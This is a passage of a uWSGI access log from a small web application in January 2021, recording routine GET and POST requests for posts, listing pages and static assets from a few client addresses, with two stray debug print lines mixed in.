bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2115/2757] 180.160.63.35 () {40 vars in 891 bytes} [Thu Jan 14 12:22:51 2021] GET /single-an-5/ => generated 3305 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2758] 180.160.63.35 () {38 vars in 824 bytes} [Thu Jan 14 12:23:10 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2116/2759] 180.160.63.35 () {40 vars in 889 bytes} [Thu Jan 14 12:23:12 2021] GET /single-an-2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2117/2760] 180.160.63.35 () {40 vars in 891 bytes} [Thu Jan 14 12:23:12 2021] GET /single-an-2/ => generated 3110 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2118/2761] 180.160.63.35 () {40 vars in 889 bytes} [Thu Jan 14 12:23:19 2021] GET /single-an-1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2119/2762] 180.160.63.35 () {40 vars in 891 bytes} [Thu Jan 14 12:23:19 2021] GET /single-an-1/ => generated 3087 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 1) +17 right here seventeenseventeenseventeen ho~ +[pid: 661|app: 0|req: 2120/2763] 180.160.48.43 () {48 vars in 1101 bytes} [Thu Jan 14 12:23:29 2021] POST /publish/ => generated 0 bytes in 145 msecs (HTTP/1.1 302) 7 headers in 203 bytes (25 switches on core 0) +[pid: 661|app: 0|req: 2121/2764] 180.160.48.43 () {42 vars in 952 bytes} [Thu Jan 14 12:23:29 2021] GET /single/15 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2122/2765] 180.160.48.43 () {42 vars in 954 bytes} [Thu Jan 14 12:23:29 2021] GET /single/15/ => generated 9308 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2766] 180.160.48.43 () {38 vars in 919 bytes} [Thu Jan 14 12:23:30 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 168198 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2123/2767] 219.228.146.135 () {42 vars in 975 bytes} [Thu Jan 14 12:23:40 2021] GET /ownpublish-0-0-0 => generated 9489 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2768] 219.228.146.135 () {42 vars in 889 bytes} [Thu Jan 14 12:23:40 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2124/2769] 180.160.48.43 () {40 vars in 923 bytes} [Thu Jan 14 12:23:40 2021] GET /all-0-0-0 => generated 13672 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2770] 180.160.48.43 () {40 vars in 897 bytes} [Thu Jan 14 12:23:41 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2771] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:23:41 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2772] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:23:41 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2773] 180.160.48.43 () {40 vars in 973 bytes} [Thu Jan 14 12:23:41 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2125/2774] 180.160.63.35 () {40 vars in 885 bytes} [Thu Jan 14 12:23:44 2021] GET /all-0-0-0 => generated 13654 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2775] 180.160.63.35 () {38 vars in 764 bytes} [Thu Jan 14 12:23:45 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2776] 180.160.63.35 () {38 vars in 762 bytes} [Thu Jan 14 12:23:45 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2777] 180.160.63.35 () {38 vars in 807 bytes} [Thu Jan 14 12:23:45 2021] GET /static/img/t_photo/wrong.jpg => generated 1420 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2778] 180.160.63.35 () {38 vars in 809 bytes} [Thu Jan 14 12:23:45 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2779] 180.160.63.35 () {38 vars in 839 bytes} [Thu Jan 14 12:23:45 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 215061 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2780] 180.160.63.35 () {38 vars in 811 bytes} [Thu Jan 14 12:23:45 2021] GET /static/img/t_photo/10_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2781] 180.160.63.35 () {38 vars in 885 bytes} [Thu Jan 14 12:23:45 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 168198 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2126/2782] 180.160.63.35 () {40 vars in 889 bytes} [Thu Jan 14 12:23:52 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2127/2783] 180.160.63.35 () {40 vars in 891 bytes} [Thu Jan 14 12:23:52 2021] GET /single/12/ => generated 10695 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2784] 180.160.63.35 () {38 vars in 810 bytes} [Thu Jan 14 12:23:52 2021] GET /static/img/t_photo/hungry.png => generated 1713 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2785] 180.160.63.35 () {38 vars in 796 bytes} [Thu Jan 14 12:23:52 2021] GET /static/img/dianzan.png => generated 2764 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2128/2786] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:24:02 2021] GET /all-0-0-0 => generated 13672 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2129/2787] 180.160.63.35 () {48 vars in 1071 bytes} [Thu Jan 14 12:24:10 2021] POST /single/12/ => generated 0 bytes in 28 msecs (HTTP/1.1 302) 7 headers in 203 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2130/2788] 180.160.63.35 () {42 vars in 921 bytes} [Thu Jan 14 12:24:10 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2131/2789] 180.160.63.35 () {42 vars in 923 bytes} [Thu Jan 14 12:24:10 2021] GET /single/12/ => generated 11161 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2132/2790] 180.160.48.43 () {42 vars in 848 bytes} [Thu Jan 14 12:24:11 2021] GET /all-0-0-0 => generated 13651 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2791] 180.160.48.43 () {42 vars in 857 bytes} [Thu Jan 14 12:24:11 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2792] 180.160.48.43 () {42 vars in 875 bytes} [Thu Jan 14 12:24:11 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2793] 180.160.48.43 () {42 vars in 836 bytes} [Thu Jan 14 12:24:11 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2794] 180.160.48.43 () {42 vars in 861 bytes} [Thu Jan 14 12:24:11 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2795] 180.160.48.43 () {42 vars in 853 bytes} [Thu Jan 14 12:24:11 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2796] 180.160.48.43 () {42 vars in 898 bytes} [Thu Jan 14 12:24:11 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2797] 180.160.48.43 () {42 vars in 892 bytes} [Thu Jan 14 12:24:11 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2798] 180.160.48.43 () {42 vars in 852 bytes} [Thu Jan 14 12:24:11 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2799] 180.160.48.43 () {42 vars in 890 bytes} [Thu Jan 14 12:24:11 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2800] 180.160.48.43 () {42 vars in 894 bytes} [Thu Jan 14 12:24:11 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2801] 180.160.48.43 () {42 vars in 922 bytes} [Thu Jan 14 12:24:11 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2802] 180.160.48.43 () {42 vars in 848 bytes} [Thu Jan 14 12:24:11 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2803] 180.160.48.43 () {42 vars in 842 bytes} [Thu Jan 14 12:24:11 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2804] 180.160.48.43 () {42 vars in 834 bytes} [Thu Jan 14 12:24:11 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2805] 180.160.48.43 () {40 vars in 913 bytes} [Thu Jan 14 12:24:11 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 168198 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2806] 180.160.48.43 () {42 vars in 850 bytes} [Thu Jan 14 12:24:11 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2807] 180.160.48.43 () {42 vars in 882 bytes} [Thu Jan 14 12:24:12 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2808] 180.160.48.43 () {42 vars in 888 bytes} [Thu Jan 14 12:24:12 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2133/2809] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:24:14 2021] GET /single/15 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2134/2810] 180.160.48.43 () {40 vars in 819 bytes} [Thu Jan 14 12:24:14 2021] GET /single/15/ => generated 9287 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2135/2811] 180.160.48.43 () {40 vars in 936 bytes} [Thu Jan 14 12:24:18 2021] GET /ownpublish-0-0-0 => generated 10043 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2812] 180.160.48.43 () {40 vars in 980 bytes} [Thu Jan 14 12:24:18 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2136/2813] 180.160.48.43 () {40 vars in 943 bytes} [Thu Jan 14 12:24:21 2021] GET /ownpublish-0-0-0 => generated 10043 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2137/2814] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 12:24:26 2021] GET /home/ => generated 10101 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2815] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:24:26 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2138/2816] 180.160.48.43 () {40 vars in 918 bytes} [Thu Jan 14 12:24:28 2021] GET /all-0-0-0 => generated 13672 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2817] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:24:28 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2818] 180.160.48.43 () {40 vars in 973 bytes} [Thu Jan 14 12:24:28 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +here +[pid: 661|app: 0|req: 2139/2819] 180.160.48.43 () {50 vars in 1005 bytes} [Thu Jan 14 12:24:31 2021] POST /single/15/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2140/2820] 180.160.48.43 () {40 vars in 820 bytes} [Thu Jan 14 12:24:31 2021] GET /single/15/ => generated 9287 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2821] 180.160.48.43 () {40 vars in 938 bytes} [Thu Jan 14 12:24:31 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2141/2822] 180.160.48.43 () {40 vars in 924 bytes} [Thu Jan 14 12:24:33 2021] GET /single/12/ => generated 11179 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2142/2823] 180.160.63.35 () {48 vars in 975 bytes} [Thu Jan 14 12:24:44 2021] POST /single/12/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2143/2824] 180.160.63.35 () {40 vars in 892 bytes} [Thu Jan 14 12:24:45 2021] GET /single/12/ => generated 10629 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2144/2825] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:24:46 2021] GET /all-0-0-0 => generated 13672 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2826] 180.160.48.43 () {40 vars in 973 bytes} [Thu Jan 14 12:24:46 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2145/2827] 180.160.48.43 () {40 vars in 918 bytes} [Thu Jan 14 12:24:52 2021] GET /single/8 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2146/2828] 180.160.48.43 () {40 vars in 920 bytes} [Thu Jan 14 12:24:52 2021] GET /single/8/ => generated 9170 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2147/2829] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:25:05 2021] GET /all-0-0-0 => generated 13651 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2148/2830] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:25:07 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2149/2831] 180.160.48.43 () {40 vars in 819 bytes} [Thu Jan 14 12:25:07 2021] GET /single/12/ => generated 10626 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2150/2832] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:25:15 2021] GET /all-0-0-0 => generated 13651 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2151/2833] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:25:22 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2152/2834] 180.160.48.43 () {40 vars in 819 bytes} [Thu Jan 14 12:25:22 2021] GET /single/12/ => generated 10626 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2153/2835] 180.160.48.43 () {50 vars in 1005 bytes} [Thu Jan 14 12:25:25 2021] POST /single/12/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2154/2836] 180.160.48.43 () {40 vars in 820 bytes} [Thu Jan 14 12:25:25 2021] GET /single/12/ => generated 10078 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2155/2837] 180.160.63.35 () {40 vars in 882 bytes} [Thu Jan 14 12:25:37 2021] GET /home/ => generated 10083 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2156/2838] 180.160.63.35 () {40 vars in 879 bytes} [Thu Jan 14 12:25:39 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2157/2839] 180.160.63.35 () {40 vars in 881 bytes} [Thu Jan 14 12:25:39 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2158/2840] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:25:44 2021] GET /all-0-0-0 => generated 13651 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2159/2841] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:25:47 2021] GET /single/10 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2160/2842] 180.160.48.43 () {40 vars in 818 bytes} [Thu Jan 14 12:25:47 2021] GET /single/10/ => generated 9690 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2843] 180.160.48.43 () {40 vars in 863 bytes} [Thu Jan 14 12:25:47 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2161/2844] 180.160.63.35 () {40 vars in 884 bytes} [Thu Jan 14 12:25:50 2021] GET /all-0-0-0 => generated 13654 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2845] 180.160.63.35 () {38 vars in 808 bytes} [Thu Jan 14 12:25:51 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2846] 180.160.63.35 () {40 vars in 865 bytes} [Thu Jan 14 12:25:51 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2847] 180.160.63.35 () {40 vars in 893 bytes} [Thu Jan 14 12:25:51 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2848] 180.160.63.35 () {40 vars in 939 bytes} [Thu Jan 14 12:25:51 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2162/2849] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:25:51 2021] GET /all-0-0-0 => generated 13651 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2163/2850] 180.160.48.43 () {40 vars in 814 bytes} [Thu Jan 14 12:25:55 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2164/2851] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:25:55 2021] GET /single/2/ => generated 9285 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2165/2852] 180.160.63.35 () {40 vars in 888 bytes} [Thu Jan 14 12:25:56 2021] GET /all-0-0-0 => generated 13654 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2166/2853] 180.160.63.35 () {40 vars in 888 bytes} [Thu Jan 14 12:25:58 2021] GET /all-0-0-0 => generated 13654 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2167/2854] 180.160.63.35 () {40 vars in 888 bytes} [Thu Jan 14 12:26:00 2021] GET /single/10 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2168/2855] 180.160.63.35 () {40 vars in 890 bytes} [Thu Jan 14 12:26:01 2021] GET /single/10/ => generated 9693 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2169/2856] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:26:03 2021] GET /all-0-0-0 => generated 13651 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2170/2857] 180.160.63.35 () {40 vars in 888 bytes} [Thu Jan 14 12:26:07 2021] GET /single/13 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2171/2858] 180.160.63.35 () {40 vars in 890 bytes} [Thu Jan 14 12:26:07 2021] GET /single/13/ => generated 9178 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2172/2859] 180.160.63.35 () {40 vars in 888 bytes} [Thu Jan 14 12:26:12 2021] GET /single/15 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2173/2860] 180.160.63.35 () {40 vars in 890 bytes} [Thu Jan 14 12:26:12 2021] GET /single/15/ => generated 9290 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2174/2861] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:26:16 2021] GET /single/13 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2175/2862] 180.160.48.43 () {40 vars in 818 bytes} [Thu Jan 14 12:26:16 2021] GET /single/13/ => generated 9175 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2863] 180.160.48.43 () {40 vars in 891 bytes} [Thu Jan 14 12:26:16 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2176/2864] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:26:21 2021] GET /all-0-0-0 => generated 13651 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2177/2865] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:26:23 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2178/2866] 180.160.48.43 () {40 vars in 818 bytes} [Thu Jan 14 12:26:23 2021] GET /single/12/ => generated 10078 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2179/2867] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:26:40 2021] GET /all-0-0-0 => generated 13672 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2868] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:26:40 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2869] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:26:40 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 